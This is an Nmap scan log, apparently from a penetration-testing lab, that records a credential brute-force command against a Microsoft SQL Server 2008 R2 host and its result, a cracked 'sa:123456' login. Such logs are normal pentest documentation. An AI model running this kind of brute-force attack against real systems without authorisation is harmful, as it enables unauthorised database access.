# Nmap 7.70 scan initiated Sat Jun  8 00:36:55 2019 as: nmap -sV -Pn --open -oN /Pentest/Scripts/Death/output/brute_ms-sql.txt --script ms-sql-brute --script-args userdb=/Pentest/PassList/Passwords/Services/mssql/user.txt,passdb=/Pentest/PassList/Passwords/Services/mssql/pass_nmap_small.txt -p1434 10.10.10.102
Nmap scan report for wind2008-r2-x64.shared (10.10.10.102)
Host is up (0.00037s latency).

PORT     STATE SERVICE  VERSION
1434/tcp open  ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-brute: 
|   [10.10.10.102:1434]
|     Credentials found:
|_      sa:123456 => Login Success
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  8 00:37:34 2019 -- 1 IP address (1 host up) scanned in 38.94 seconds
